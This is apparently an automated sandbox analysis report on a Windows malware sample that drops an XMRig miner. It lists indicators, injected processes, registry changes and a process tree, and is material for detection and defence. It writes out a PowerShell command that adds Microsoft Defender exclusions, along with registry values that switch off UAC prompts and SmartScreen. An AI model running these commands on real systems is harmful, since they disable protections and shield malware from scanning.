Analysis
-
max time kernel
153s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
15-01-2023 10:35
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220812-en
General
-
Target
tmp.exe
-
Size
3.2MB
-
MD5
031b4e1936f8758b15a7a26045162e3a
-
SHA1
5de003a965dde33ca504abc1d4f524e5a285b328
-
SHA256
4718af9354fd4c3f45bcd3ac66cf3e66f90004a9703dfc757690cbd669773aad
-
SHA512
2b99a219704c7bfcc21e0831c691d482230daa0781705ae1b2fa7c7410a3bb63797f69d0efe64c6edd55de2e5f7c876c72fc3ca76ad369db11b59498c1fbb394
-
SSDEEP
98304:5C7tc/q94MEjFFbK2gD4iyA9GZ5aICRdbw+a:pDMKbAExeIWbha
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
tmp999F.tmp6qphtob5vjtm.exeWinUpdate.execonhost.exedescription pid process target process PID 4252 created 3052 4252 tmp999F.tmp6qphtob5vjtm.exe Explorer.EXE PID 4252 created 3052 4252 tmp999F.tmp6qphtob5vjtm.exe Explorer.EXE PID 4252 created 3052 4252 tmp999F.tmp6qphtob5vjtm.exe Explorer.EXE PID 4252 created 3052 4252 tmp999F.tmp6qphtob5vjtm.exe Explorer.EXE PID 228 created 3052 228 WinUpdate.exe Explorer.EXE PID 228 created 3052 228 WinUpdate.exe Explorer.EXE PID 228 created 3052 228 WinUpdate.exe Explorer.EXE PID 228 created 3052 228 WinUpdate.exe Explorer.EXE PID 228 created 3052 228 WinUpdate.exe Explorer.EXE PID 4088 created 3052 4088 conhost.exe Explorer.EXE PID 228 created 3052 228 WinUpdate.exe Explorer.EXE -
Processes:
tmp99A0.tmp8fqnwwfient.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" tmp99A0.tmp8fqnwwfient.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
tmp.exetmp99A0.tmp8fqnwwfient.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ tmp99A0.tmp8fqnwwfient.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4844-212-0x00007FF632F50000-0x00007FF633744000-memory.dmp xmrig behavioral2/memory/4844-214-0x00007FF632F50000-0x00007FF633744000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
tmp999F.tmp6qphtob5vjtm.exetmp99A0.tmp8fqnwwfient.exeWinUpdate.exepid process 4252 tmp999F.tmp6qphtob5vjtm.exe 4224 tmp99A0.tmp8fqnwwfient.exe 228 WinUpdate.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/4844-212-0x00007FF632F50000-0x00007FF633744000-memory.dmp upx behavioral2/memory/4844-214-0x00007FF632F50000-0x00007FF633744000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
tmp.exetmp99A0.tmp8fqnwwfient.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tmp99A0.tmp8fqnwwfient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tmp99A0.tmp8fqnwwfient.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation tmp.exe -
Obfuscated with Agile.Net obfuscator 6 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral2/memory/4240-135-0x0000000000250000-0x0000000000AE6000-memory.dmp agile_net behavioral2/memory/4240-136-0x0000000000250000-0x0000000000AE6000-memory.dmp agile_net behavioral2/memory/4240-148-0x0000000000250000-0x0000000000AE6000-memory.dmp agile_net behavioral2/memory/4224-153-0x0000000000070000-0x000000000088A000-memory.dmp agile_net behavioral2/memory/4224-152-0x0000000000070000-0x000000000088A000-memory.dmp agile_net behavioral2/memory/4224-179-0x0000000000070000-0x000000000088A000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/4240-135-0x0000000000250000-0x0000000000AE6000-memory.dmp themida behavioral2/memory/4240-136-0x0000000000250000-0x0000000000AE6000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exe themida C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exe themida behavioral2/memory/4240-148-0x0000000000250000-0x0000000000AE6000-memory.dmp themida behavioral2/memory/4224-153-0x0000000000070000-0x000000000088A000-memory.dmp themida behavioral2/memory/4224-152-0x0000000000070000-0x000000000088A000-memory.dmp themida behavioral2/memory/4224-179-0x0000000000070000-0x000000000088A000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
tmp99A0.tmp8fqnwwfient.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver package v0.11 = "C:\\Users\\Admin\\AppData\\Local\\Driver package v0.11\\Driverpackage.exe" tmp99A0.tmp8fqnwwfient.exe -
Processes:
tmp.exetmp99A0.tmp8fqnwwfient.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tmp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tmp99A0.tmp8fqnwwfient.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com 6 icanhazip.com 7 icanhazip.com -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
WinUpdate.exedescription pid process target process PID 228 set thread context of 4088 228 WinUpdate.exe conhost.exe PID 228 set thread context of 4844 228 WinUpdate.exe svchost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
tmp999F.tmp6qphtob5vjtm.exeWinUpdate.execmd.execmd.exedescription ioc process File created C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe tmp999F.tmp6qphtob5vjtm.exe File created C:\Program Files\Google\Libs\WR64.sys WinUpdate.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2412 sc.exe 2424 sc.exe 372 sc.exe 4752 sc.exe 1440 sc.exe 4544 sc.exe 3104 sc.exe 1660 sc.exe 4180 sc.exe 3912 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4928 4224 WerFault.exe tmp99A0.tmp8fqnwwfient.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
tmp.exetmp99A0.tmp8fqnwwfient.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tmp99A0.tmp8fqnwwfient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString tmp99A0.tmp8fqnwwfient.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tmp.exetmp999F.tmp6qphtob5vjtm.exepowershell.exetmp99A0.tmp8fqnwwfient.exepowershell.exepowershell.exeWinUpdate.exepowershell.exepowershell.execonhost.exepid process 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4240 tmp.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 3060 powershell.exe 3060 powershell.exe 4224 tmp99A0.tmp8fqnwwfient.exe 4224 tmp99A0.tmp8fqnwwfient.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 4224 tmp99A0.tmp8fqnwwfient.exe 1268 powershell.exe 1268 powershell.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 4252 tmp999F.tmp6qphtob5vjtm.exe 1816 powershell.exe 1816 powershell.exe 228 WinUpdate.exe 228 WinUpdate.exe 4840 powershell.exe 4840 powershell.exe 228 WinUpdate.exe 228 WinUpdate.exe 228 WinUpdate.exe 228 WinUpdate.exe 100 powershell.exe 100 powershell.exe 228 WinUpdate.exe 228 WinUpdate.exe 228 WinUpdate.exe 228 WinUpdate.exe 4088 conhost.exe 4088 conhost.exe 228 WinUpdate.exe 228 WinUpdate.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 644 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tmp.exemsiexec.exepowershell.exetmp99A0.tmp8fqnwwfient.exepowershell.exedescription pid process Token: SeDebugPrivilege 4240 tmp.exe Token: SeSecurityPrivilege 3776 msiexec.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 4224 tmp99A0.tmp8fqnwwfient.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeIncreaseQuotaPrivilege 1268 powershell.exe Token: SeSecurityPrivilege 1268 powershell.exe Token: SeTakeOwnershipPrivilege 1268 powershell.exe Token: SeLoadDriverPrivilege 1268 powershell.exe Token: SeSystemProfilePrivilege 1268 powershell.exe Token: SeSystemtimePrivilege 1268 powershell.exe Token: SeProfSingleProcessPrivilege 1268 powershell.exe Token: SeIncBasePriorityPrivilege 1268 powershell.exe Token: SeCreatePagefilePrivilege 1268 powershell.exe Token: SeBackupPrivilege 1268 powershell.exe Token: SeRestorePrivilege 1268 powershell.exe Token: SeShutdownPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeSystemEnvironmentPrivilege 1268 powershell.exe Token: SeRemoteShutdownPrivilege 1268 powershell.exe Token: SeUndockPrivilege 1268 powershell.exe Token: SeManageVolumePrivilege 1268 powershell.exe Token: 33 1268 powershell.exe Token: 34 1268 powershell.exe Token: 35 1268 powershell.exe Token: 36 1268 powershell.exe Token: SeIncreaseQuotaPrivilege 1268 powershell.exe Token: SeSecurityPrivilege 1268 powershell.exe Token: SeTakeOwnershipPrivilege 1268 powershell.exe Token: SeLoadDriverPrivilege 1268 powershell.exe Token: SeSystemProfilePrivilege 1268 powershell.exe Token: SeSystemtimePrivilege 1268 powershell.exe Token: SeProfSingleProcessPrivilege 1268 powershell.exe Token: SeIncBasePriorityPrivilege 1268 powershell.exe Token: SeCreatePagefilePrivilege 1268 powershell.exe Token: SeBackupPrivilege 1268 powershell.exe Token: SeRestorePrivilege 1268 powershell.exe Token: SeShutdownPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeSystemEnvironmentPrivilege 1268 powershell.exe Token: SeRemoteShutdownPrivilege 1268 powershell.exe Token: SeUndockPrivilege 1268 powershell.exe Token: SeManageVolumePrivilege 1268 powershell.exe Token: 33 1268 powershell.exe Token: 34 1268 powershell.exe Token: 35 1268 powershell.exe Token: 36 1268 powershell.exe Token: SeIncreaseQuotaPrivilege 1268 powershell.exe Token: SeSecurityPrivilege 1268 powershell.exe Token: SeTakeOwnershipPrivilege 1268 powershell.exe Token: SeLoadDriverPrivilege 1268 powershell.exe Token: SeSystemProfilePrivilege 1268 powershell.exe Token: SeSystemtimePrivilege 1268 powershell.exe Token: SeProfSingleProcessPrivilege 1268 powershell.exe Token: SeIncBasePriorityPrivilege 1268 powershell.exe Token: SeCreatePagefilePrivilege 1268 powershell.exe Token: SeBackupPrivilege 1268 powershell.exe Token: SeRestorePrivilege 1268 powershell.exe Token: SeShutdownPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeSystemEnvironmentPrivilege 1268 powershell.exe Token: SeRemoteShutdownPrivilege 1268 powershell.exe Token: SeUndockPrivilege 1268 powershell.exe Token: SeManageVolumePrivilege 1268 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
tmp.execmd.exepowershell.execmd.exeWinUpdate.execmd.exedescription pid process target process PID 4240 wrote to memory of 4252 4240 tmp.exe tmp999F.tmp6qphtob5vjtm.exe PID 4240 wrote to memory of 4252 4240 tmp.exe tmp999F.tmp6qphtob5vjtm.exe PID 4240 wrote to memory of 4224 4240 tmp.exe tmp99A0.tmp8fqnwwfient.exe PID 4240 wrote to memory of 4224 4240 tmp.exe tmp99A0.tmp8fqnwwfient.exe PID 4240 wrote to memory of 4224 4240 tmp.exe tmp99A0.tmp8fqnwwfient.exe PID 3192 wrote to memory of 372 3192 cmd.exe sc.exe PID 3192 wrote to memory of 372 3192 cmd.exe sc.exe PID 3192 wrote to memory of 4180 3192 cmd.exe sc.exe PID 3192 wrote to memory of 4180 3192 cmd.exe sc.exe PID 3192 wrote to memory of 4752 3192 cmd.exe sc.exe PID 3192 wrote to memory of 4752 3192 cmd.exe sc.exe PID 3192 wrote to memory of 3912 3192 cmd.exe sc.exe PID 3192 wrote to memory of 3912 3192 cmd.exe sc.exe PID 3192 wrote to memory of 2412 3192 cmd.exe sc.exe PID 3192 wrote to memory of 2412 3192 cmd.exe sc.exe PID 3192 wrote to memory of 4344 3192 cmd.exe reg.exe PID 3192 wrote to memory of 4344 3192 cmd.exe reg.exe PID 3192 wrote to memory of 1340 3192 cmd.exe reg.exe PID 3192 wrote to memory of 1340 3192 cmd.exe reg.exe PID 3192 wrote to memory of 3404 3192 cmd.exe reg.exe PID 3192 wrote to memory of 3404 3192 cmd.exe reg.exe PID 3192 wrote to memory of 2116 3192 cmd.exe reg.exe PID 3192 wrote to memory of 2116 3192 cmd.exe reg.exe PID 3192 wrote to memory of 3884 3192 cmd.exe reg.exe PID 3192 wrote to memory of 3884 3192 cmd.exe reg.exe PID 1816 wrote to memory of 3012 1816 powershell.exe schtasks.exe PID 1816 wrote to memory of 3012 1816 powershell.exe schtasks.exe PID 4720 wrote to memory of 1440 4720 cmd.exe sc.exe PID 4720 wrote to memory of 1440 4720 cmd.exe sc.exe PID 4720 wrote to memory of 2424 4720 cmd.exe sc.exe PID 4720 wrote to memory of 2424 4720 cmd.exe sc.exe PID 4720 wrote to memory of 4544 4720 cmd.exe sc.exe PID 4720 wrote to memory of 4544 4720 cmd.exe sc.exe PID 4720 wrote to memory of 3104 4720 cmd.exe sc.exe PID 4720 wrote to memory of 3104 4720 cmd.exe sc.exe PID 4720 wrote to memory of 1660 4720 cmd.exe sc.exe PID 4720 wrote to memory of 1660 4720 cmd.exe sc.exe PID 4720 wrote to memory of 2840 4720 cmd.exe reg.exe PID 4720 wrote to memory of 2840 4720 cmd.exe reg.exe PID 4720 wrote to memory of 3228 4720 cmd.exe reg.exe PID 4720 wrote to memory of 3228 4720 cmd.exe reg.exe PID 4720 wrote to memory of 1984 4720 cmd.exe reg.exe PID 4720 wrote to memory of 1984 4720 cmd.exe reg.exe PID 4720 wrote to memory of 3388 4720 cmd.exe reg.exe PID 4720 wrote to memory of 3388 4720 cmd.exe reg.exe PID 4720 wrote to memory of 3432 4720 cmd.exe reg.exe PID 4720 wrote to memory of 3432 4720 cmd.exe reg.exe PID 228 wrote to memory of 4088 228 WinUpdate.exe conhost.exe PID 1940 wrote to memory of 2448 1940 cmd.exe WMIC.exe PID 1940 wrote to memory of 2448 1940 cmd.exe WMIC.exe PID 228 wrote to memory of 4844 228 WinUpdate.exe svchost.exe -
System policy modification 1 TTPs 10 IoCs
Processes:
tmp99A0.tmp8fqnwwfient.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" tmp99A0.tmp8fqnwwfient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" tmp99A0.tmp8fqnwwfient.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exe"C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exe"C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exe"3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 16324⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
